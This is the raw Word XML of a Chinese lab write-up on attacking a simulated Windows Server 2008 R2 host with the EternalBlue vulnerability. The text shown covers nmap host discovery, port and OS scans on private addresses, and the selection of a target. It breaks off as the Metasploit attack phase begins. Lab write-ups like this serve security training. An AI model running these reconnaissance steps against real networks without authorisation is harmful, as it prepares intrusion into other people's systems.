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  <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用永恒之蓝漏洞攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过程记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="964"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="960"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>2020年6月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="960"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="147480807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EastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:ind w:firstLine="480"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:t>目录</w:t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ajorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="min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inorEastAsia"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="21"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="min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instrText xml:space="preserve"> HYPERLINK \l _Toc17418 </w:instrText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 xml:space="preserve">一 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>模拟环境准备阶段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_Toc17418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3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instrText xml:space="preserve"> HYPERLINK \l _Toc32314 </w:instrText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 xml:space="preserve">二 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>信息搜集阶段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_Toc32314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3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480" w:lineRule="auto"/>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pP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instrText xml:space="preserve"> HYPERLINK \l _Toc3442 </w:instrText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 xml:space="preserve">2.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>确定网段内的存活主机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_Toc3442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3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instrText xml:space="preserve"> HYPERLINK \l _Toc28710 </w:instrText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 xml:space="preserve">2.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>确定存活主机开放端口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_Toc28710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4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instrText xml:space="preserve"> HYPERLINK \l _Toc31206 </w:instrText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 xml:space="preserve">2.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>确定存活主机操作系统（可选）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_Toc31206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5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instrText xml:space="preserve"> HYPERLINK \l _Toc24128 </w:instrText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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve">2.4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>根据操作系统版本对比确定可能存在漏洞主机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_Toc24128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5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2"/>
            </w:rPr>
          </w:pP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instrText xml:space="preserve"> HYPERLINK \l _Toc9935 </w:instrText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2"/>
            </w:rPr>
            <w:t xml:space="preserve">三 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>攻击阶段</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9935 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w: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end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:ind w:firstLine="480"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="21"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc17418"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模拟环境准备阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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模拟攻击机：Kali 2020版</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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模拟受害主机：Windows Server 2008 R2 Enterprise 7600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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扫描阶段工具（kali自带）：nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">攻击阶段工具（kali自带）：metasploitframework </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc32314"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息搜集阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc3442"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>确定网段内的存活主机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使用nmap扫描指定网段存活主机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命令：nmap -sP 192.168.206.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3594100" cy="302260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通过nmap扫描可知当前网段的存活主机如下：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192.168.206.1；192.168.206.2；192.168.206.128；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192.168.206.129；192.168.206.133；192.168.206.134；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192.168.206.140；192.168.206.200；192.168.206.254。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc28710"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>确定存活主机开放端口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p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通过nmap扫描存活主机开放端口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命令：nmap 192.168.206.1 192.168.206.2 192.168.206.128 192.168.206.133 192.168.206.134 192.168.206.140 192.168.206.129 192.168.206.254</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1007745"/>
            <wp:effectExtent l="0" t="0" r="1270" b="825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136900" cy="1549400"/>
            <wp:effectExtent l="0" t="0" r="0" b="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64000" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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35300" cy="958850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc31206"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>确定存活主机操作系统（可选）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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通过nmap扫描存活主机操作系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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命令：nmap -O 192.168.206.134 （简要信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3771900" cy="463550"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nmap -A 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>206</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>134（详细信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2426970"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1143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line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc24128"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根据操作系统版本对比确定可能存在漏洞主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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根据版本对比后确定可能存在漏洞的主机地址为：192.168.206.134</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc9935"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>metasploitframework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
